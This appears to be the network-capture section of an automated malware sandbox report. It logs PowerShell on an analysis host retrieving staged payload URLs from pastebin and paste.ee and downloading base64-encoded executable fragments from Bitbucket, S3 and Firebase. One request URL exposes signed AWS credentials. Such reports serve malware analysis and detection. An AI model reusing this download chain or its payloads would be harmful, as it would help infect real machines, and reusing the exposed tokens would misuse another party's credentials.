                                                            Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.c [TRUNCATED]
                                                            X-Usage-Quota-Remaining: 999145.950
                                                            X-Usage-Request-Cost: 866.23
                                                            X-Usage-User-Time: 0.020627
                                                            X-Usage-System-Time: 0.005360
                                                            X-Usage-Input-Ops: 0
                                                            X-Usage-Output-Ops: 0
                                                            Age: 0
                                                            X-Cache: MISS
                                                            X-Content-Type-Options: nosniff
                                                            X-Xss-Protection: 1; mode=block
                                                            Atl-Traceid: 7e9ee825fd3145a9b0b5daf02ab0c10a
                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Server-Timing: atl-edge;dur=152,atl-edge-internal;dur=2,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54970752.216.144.114436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:09 UTC1217OUTGET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP [TRUNCATED]
                                                            Host: bbuseruploads.s3.amazonaws.com
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:09 UTC532INHTTP/1.1 200 OK
                                                            x-amz-id-2: yJbd0TDyqmR/wwOrU8w19vEqzLHDmjfuRJZAFaWwl1vK1ZG6uQOJI73h0gJ42Y9rROKYgG3WmWI=
                                                            x-amz-request-id: VQ9ZX2N9XR3NN1N4
                                                            Date: Thu, 03 Oct 2024 04:53:10 GMT
                                                            Last-Modified: Thu, 03 Oct 2024 02:55:57 GMT
                                                            ETag: "d56deb4b43b26b748bc2d1b71f2b2745"
                                                            x-amz-server-side-encryption: AES256
                                                            x-amz-version-id: bnHQMdnIBnCcgFolFg0Y53FDW8.EhoTE
                                                            Content-Disposition: attachment; filename="dsadsdsadsadsa.txt"
                                                            Accept-Ranges: bytes
                                                            Content-Type: text/plain
                                                            Server: AmazonS3
                                                            Content-Length: 12972
                                                            Connection: close
                                                            2024-10-03 04:53:09 UTC12972INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4f 34 46 2f 6d 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 34 41 41 41 41 47 41 41 41 41 41 41 41 41 50 6a 77 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAO4F/mYAAAAAAAAAAOAAIiALAVAAAB4AAAAGAAAAAAAAPjwAAAAgAAAAAAAAAAAAEAAgAAAAAgA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549708104.20.4.2354436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:10 UTC50OUTGET /raw/sFgsbG3v HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:10 UTC391INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:10 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:10 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca53b41bf38c7d-EWR
                                                            2024-10-03 04:53:10 UTC142INData Raw: 38 38 0d 0a 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 72 6f 64 72 69 61 6b 64 2d 38 34 31 33 64 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 50 65 25 32 46 70 2e 74 78 74 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 61 37 34 30 32 65 33 30 2d 37 33 31 62 2d 34 30 32 61 2d 61 62 36 35 2d 62 34 66 66 62 64 62 65 38 39 30 64 0d 0a
                                                            Data Ascii: 88https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp.txt?alt=media&token=a7402e30-731b-402a-ab65-b4ffbdbe890d
                                                            2024-10-03 04:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549710104.20.4.2354436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:12 UTC50OUTGET /raw/cD7bJS7b HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-10-03 04:53:13 UTC388INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:13 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: MISS
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:13 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca53c4ce20de97-EWR
                                                            2024-10-03 04:53:13 UTC32INData Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 2e 65 65 2f 64 2f 6c 48 62 48 6f 2f 30 0d 0a
                                                            Data Ascii: 1ahttps://paste.ee/d/lHbHo/0
                                                            2024-10-03 04:53:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549711188.114.96.34436400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:14 UTC67OUTGET /d/lHbHo/0 HTTP/1.1
                                                            Host: paste.ee
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:14 UTC1200INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:14 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=2592000
                                                            strict-transport-security: max-age=63072000
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1; mode=block
                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6onGmFIzPxqj3cE9xQSS9k90uaIKPC5l2Ak68C7iDYRcu54Rs8q%2FJST5izVhpUdxQdNiLyuOd8mqsHY02cJTWaSmzzhFNlXeB9yEDcRqN9EedcMfMshHHktqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8cca53cb4a5d17b1-EWR
                                                            2024-10-03 04:53:14 UTC169INData Raw: 66 37 66 0d 0a 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: f7f=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 44 41 75 41 41 4d 41 34 43 41 77 41 67 4c 41 45 44 41 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41 6c 42 67 56
                                                            Data Ascii: NnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHAlBgV
                                                            2024-10-03 04:53:14 UTC1067INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 34 30 30 30 0d 0a 42 64 48 6f 45 41 41 53 42 46 44 6f 45 63 30 52 33 42 4b 42 48 6c 48 6f 45 63 59 77 42 50 55 68 67 53 30 61 67 53 45 41 41 49 6b 68 67 52 45 51 41 67 59 67 41 64 77 52 48 63 30 52 46 43 4b 52 72 42 4b 42 48 47 63 77 44 4f 55 4d 67 53 34 41 43 43 55 77 42 4a 45 68 67 53 41 41 49 46 34 51 44 43 4b 52 41 41 59 51 43 43 4b 52 42 43 4b 68 41 48 67 67 44 42 6f 77 41 43 41 67 48 43 6b 66 67 53 55 42 41 65 45 51 41 43 4b 52 46 43 49 51 41 51 4d 68 41 4f 49 51 2b 42 4b 52 46 48 30 61 67 53 30 42 41 41 59 41 41 54 45 51 41 67 55 67 44 42 55 66 67 53 55 68 42 74 47 6f 45 64 67 67 44 64 67 51 72 42 4b 68 44 42 55 66 67 53 55 42 48 49 67 77 42 56 45 55 45 42 46 68 41 43 41 77 42 42 46 42 41 67 51 51 44 42 46 52 41 41 55 67 44 64 4d 51 48 46 44 6f 45
                                                            Data Ascii: 4000BdHoEAASBFDoEc0R3BKBHlHoEcYwBPUhgS0agSEAAIkhgREQAgYgAdwRHc0RFCKRrBKBHGcwDOUMgS4ACCUwBJEhgSAAIF4QDCKRAAYQCCKRBCKhAHggDBowACAgHCkfgSUBAeEQACKRFCIQAQMhAOIQ+BKRFH0agS0BAAYAATEQAgUgDBUfgSUhBtGoEdggDdgQrBKhDBUfgSUBHIgwBVEUEBFhACAwBBFBAgQQDBFRAAUgDdMQHFDoE
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 67 41 41 55 41 41 54 45 67 43 45 41 77 45 43 41 77 45 42 67 68 45 56 59 41 41 54 45 77 42 45 41 67 48 42 6f 41 42 41 34 42 41 42 41 52 42 41 34 68 41 41 34 52 41 48 51 67 44 42 63 77 41 31 43 59 45 56 49 52 41 41 63 51 46 53 45 77 42 45 67 51 41 48 4d 41 48 63 45 41 41 45 49 51 41 48 4d 41 46 53 45 77 42 45 45 68 45 42 63 41 42 49 49 52 41 48 51 41 44 53 45 77 42 45 51 68 45 42 67 68 45 56 59 51 45 53 45 41 47 53 55 68 42 49 49 52 41 59 49 52 46 47 77 67 45 42 67 68 45 56 59 67 50 6b 39 47 61 30 56 57 62 67 51 57 5a 30 46 6d 63 6c 35 57 5a 6e 78 6a 45 6c 42 58 65 55 52 67 44 55 42 51 41 2b 51 32 62 6f 52 58 5a 74 42 43 5a 6c 52 58 59 79 56 6d 62 6c 64 47 50 53 41 51 41 78 49 51 41 42 41 43 42 41 41 41 41 66 39 56 5a 6a 35 57 59 30 4e 6e 62 4a 39 31 58 6c
                                                            Data Ascii: gAAUAATEgCEAwECAwEBghEVYAATEwBEAgHBoABA4BABARBA4hAA4RAHQgDBcwA1CYEVIRAAcQFSEwBEgQAHMAHcEAAEIQAHMAFSEwBEEhEBcABIIRAHQADSEwBEQhEBghEVYQESEAGSUhBIIRAYIRFGwgEBghEVYgPk9Ga0VWbgQWZ0Fmcl5WZnxjElBXeURgDUBQA+Q2boRXZtBCZlRXYyVmbldGPSAQAxIQABACBAAAAf9VZj5WY0NnbJ91Xl
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 43 53 41 41 41 45 77 67 45 41 41 41 42 42 41 41 41 44 51 68 45 42 67 68 45 56 59 77 42 52 49 52 41 59 49 52 46 47 63 41 43 53 45 41 47 53 55 68 42 48 77 67 45 42 67 68 45 56 59 77 42 4a 43 4f 4e 5a 59 46 58 36 64 4c 43 49 41 41 41 44 34 41 41 41 4d 51 41 41 41 79 41 36 6f 51 31 52 38 33 58 2f 41 4c 43 41 6b 4e 42 45 31 68 71 74 4e 4d 6e 4a 31 66 71 46 36 4c 55 4a 6c 4d 41 41 4d 44 41 4d 42 77 4d 41 6b 46 41 45 42 51 52 41 51 45 41 30 41 77 53 41 55 47 41 47 42 41 4f 41 51 46 41 55 42 67 4d 41 63 48 41 6b 42 67 51 41 45 48 41 4a 42 67 59 41 6b 48 41 52 42 77 56 41 34 47 41 31 42 51 57 41 38 45 41 50 42 41 53 41 6f 48 41 59 42 51 55 41 51 45 41 36 42 41 4f 41 4d 44 41 71 42 77 54 41 63 46 41 4b 42 67 62 41 55 47 41 31 42 51 59 41 34 47 41 4c 42 77 56 41 45
                                                            Data Ascii: CSAAAEwgEAAABBAAADQhEBghEVYwBRIRAYIRFGcACSEAGSUhBHwgEBghEVYwBJCONZYFX6dLCIAAAD4AAAMQAAAyA6oQ1R83X/ALCAkNBE1hqtNMnJ1fqF6LUJlMAAMDAMBwMAkFAEBQRAQEA0AwSAUGAGBAOAQFAUBgMAcHAkBgQAEHAJBgYAkHARBwVA4GA1BQWA8EAPBASAoHAYBQUAQEA6BAOAMDAqBwTAcFAKBgbAUGA1BQYA4GALBwVAE
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 41 6f 47 41 34 41 41 4f 41 34 45 41 30 41 51 4f 41 6b 44 41 31 42 77 55 41 4d 45 41 34 42 67 53 41 67 44 41 74 42 51 62 41 63 47 41 4c 42 51 53 41 55 47 41 56 42 41 61 41 6b 47 41 75 42 41 62 41 6b 48 41 71 42 77 4d 41 6b 45 41 4c 42 41 53 41 59 47 41 52 42 67 4e 41 59 46 41 30 42 41 4e 41 49 44 41 45 42 51 51 41 49 46 41 44 42 51 55 41 67 47 41 59 42 77 53 70 43 49 41 41 41 46 41 78 41 67 54 41 51 45 41 76 42 51 63 41 49 44 41 5a 42 67 63 41 77 47 41 53 42 77 53 41 45 45 41 44 42 77 59 41 6b 44 41 46 42 41 4f 41 59 46 41 34 42 67 53 41 63 44 41 57 42 51 64 41 67 45 41 53 42 51 61 41 6f 45 41 72 42 67 4e 41 4d 46 41 36 42 51 56 41 6f 47 41 51 42 77 61 41 55 47 41 59 42 41 57 41 49 44 41 33 42 51 5a 41 49 46 41 6a 42 77 5a 41 67 45 41 74 42 77 63 41 6b 48
                                                            Data Ascii: AoGA4AAOA4EA0AQOAkDA1BwUAMEA4BgSAgDAtBQbAcGALBQSAUGAVBAaAkGAuBAbAkHAqBwMAkEALBASAYGARBgNAYFA0BANAIDAEBQQAIFADBQUAgGAYBwSpCIAAAFAxAgTAQEAvBQcAIDAZBgcAwGASBwSAEEADBwYAkDAFBAOAYFA4BgSAcDAWBQdAgEASBQaAoEArBgNAMFA6BQVAoGAQBwaAUGAYBAWAIDA3BQZAIFAjBwZAgEAtBwcAkH
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 42 77 61 41 55 48 41 69 42 41 63 41 34 47 41 4f 42 51 55 41 6f 46 41 35 42 51 4e 41 63 45 41 77 41 67 64 41 45 46 41 76 42 67 61 41 55 46 41 47 42 51 4f 41 30 47 41 4b 42 41 64 41 49 44 41 68 42 51 53 41 4d 48 41 4f 42 77 4e 41 77 47 41 77 41 51 55 41 41 44 41 77 41 51 57 48 44 49 41 41 67 45 41 73 42 67 4d 41 55 47 41 7a 42 41 52 41 51 47 41 36 42 51 57 41 45 46 41 76 42 41 54 41 6f 47 41 47 42 41 65 41 45 44 41 6f 42 67 63 41 4d 47 41 4d 42 41 65 41 59 46 41 77 42 67 56 41 34 47 41 32 42 77 63 41 6b 44 41 4d 42 67 5a 41 63 47 41 47 42 77 55 41 6f 47 41 36 42 77 4e 41 6f 47 41 47 42 67 61 41 51 44 41 74 42 67 64 41 63 45 41 56 42 51 54 41 77 47 41 58 42 51 61 41 63 47 41 4a 42 41 4d 41 6b 48 41 46 42 41 57 41 34 47 41 79 42 41 4f 41 77 47 41 72 42 67 56
                                                            Data Ascii: BwaAUHAiBAcA4GAOBQUAoFA5BQNAcEAwAgdAEFAvBgaAUFAGBQOA0GAKBAdAIDAhBQSAMHAOBwNAwGAwAQUAADAwAQWHDIAAgEAsBgMAUGAzBARAQGA6BQWAEFAvBATAoGAGBAeAEDAoBgcAMGAMBAeAYFAwBgVA4GA2BwcAkDAMBgZAcGAGBwUAoGA6BwNAoGAGBgaAQDAtBgdAcEAVBQTAwGAXBQaAcGAJBAMAkHAFBAWA4GAyBAOAwGArBgV
                                                            2024-10-03 04:53:14 UTC1369INData Raw: 47 41 71 42 77 51 41 4d 44 41 42 42 41 52 41 49 45 41 47 42 51 51 41 77 45 41 31 42 41 54 41 51 47 41 42 42 77 63 41 55 47 41 35 41 77 64 41 49 44 41 75 42 67 4d 41 63 48 41 79 41 41 57 48 44 49 41 41 63 44 41 59 42 51 52 41 45 46 41 31 42 41 61 41 49 48 41 30 41 67 51 41 63 48 41 30 41 51 61 41 63 48 41 47 42 77 56 41 45 44 41 51 42 67 61 41 51 48 41 4b 42 41 62 41 6f 46 41 71 42 51 59 41 4d 45 41 6d 42 67 64 41 45 44 41 46 42 41 55 41 63 44 41 77 42 77 52 41 55 44 41 72 42 67 57 41 51 46 41 74 42 67 51 41 49 48 41 52 42 51 5a 41 6f 47 41 71 42 67 64 41 59 45 41 61 42 67 53 41 49 48 41 75 42 51 4e 41 49 46 41 33 42 41 64 41 49 47 41 43 42 51 61 41 49 45 41 74 42 41 53 41 63 45 41 6c 42 51 52 41 63 44 41 79 42 67 4d 41 49 46 41 32 42 77 55 41 6f 45 41 72
                                                            Data Ascii: GAqBwQAMDABBARAIEAGBQQAwEA1BATAQGABBwcAUGA5AwdAIDAuBgMAcHAyAAWHDIAAcDAYBQRAEFA1BAaAIHA0AgQAcHA0AQaAcHAGBwVAEDAQBgaAQHAKBAbAoFAqBQYAMEAmBgdAEDAFBAUAcDAwBwRAUDArBgWAQFAtBgQAIHARBQZAoGAqBgdAYEAaBgSAIHAuBQNAIFA3BAdAIGACBQaAIEAtBASAcEAlBQRAcDAyBgMAIFA2BwUAoEAr


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549722104.20.4.2354437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:28 UTC74OUTGET /raw/V9y5Q5vv HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:28 UTC396INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 04:53:28 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Thu, 03 Oct 2024 04:53:07 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8cca5424c9104228-EWR
                                                            2024-10-03 04:53:28 UTC83INData Raw: 34 64 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 38 39 39 39 39 39 39 39 39 39 39 39 39 39 2f 61 63 61 61 61 61 61 61 61 61 61 2f 64 6f 77 6e 6c 6f 61 64 73 2f 64 73 61 64 73 64 73 61 64 73 61 64 73 61 2e 74 78 74 0d 0a
                                                            Data Ascii: 4dhttps://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
                                                            2024-10-03 04:53:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549723185.166.143.504437096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 04:53:29 UTC118OUTGET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1
                                                            Host: bitbucket.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 04:53:29 UTC5124INHTTP/1.1 302 Found
                                                            Date: Thu, 03 Oct 2024 04:53:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 0
                                                            Server: AtlassianEdge
